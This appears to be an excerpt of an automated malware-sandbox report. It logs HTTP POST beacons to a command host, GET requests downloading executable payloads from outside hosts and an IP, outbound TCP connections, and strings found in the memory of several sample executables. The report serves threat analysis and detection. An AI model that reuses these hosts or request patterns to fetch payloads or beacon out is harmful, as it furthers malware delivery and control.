                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdyptjaakt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yescuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okbhh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukbyppnr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwqvad.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjqdm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: GET /files/9370_1636985686_7616.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host0.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atanmkbpso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkilsvrrd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tltympjjb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtofyflq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltdhgfb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqdjygbwuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krhxuby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: GET /vN1zS0qN2nD1iF6p/04805958955520964044.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.87.154.2
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iuyisco.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxapoluwf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cqpptcaaq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kunlarxj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcarunhrnf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://egvtcfnms.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urcbtq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fwulqvf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mslexfru.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://luhjtydl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jorckc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yeqvyp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wcqjtt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psltwkawe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpvkqv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxcbx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-file-host6.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iukehj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: host-file-host6.com
                      Source: global trafficTCP traffic: 192.168.2.7:49821 -> 93.115.20.139:28978
                      Source: global trafficTCP traffic: 192.168.2.7:49858 -> 45.9.20.149:10844
                      Source: E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: 2D0D.exe, 0000001B.00000002.564896495.00000000041C6000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554234581.0000000002BAE000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
                      Source: 2D0D.exe, 0000001B.00000002.581256486.00000000070F4000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.563896024.0000000005DEC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: E8E7.exe, 0000001C.00000002.554783778.0000000002C72000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: DA6F.exe, 00000011.00000002.566852470.00000000040BB000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.567566286.0000000004468000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.552789222.0000000002963000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: DA6F.exe, 00000011.00000002.562545735.0000000003CB1000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560282006.0000000003E31000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.547788549.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: DA6F.exe, 00000011.00000002.563013764.0000000003D40000.00000004.00000001.sdmp, 2D0D.exe, 0000001B.00000002.560794263.0000000003EC0000.00000004.00000001.sdmp, E8E7.exe, 0000001C.00000002.549911553.0000000002844000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
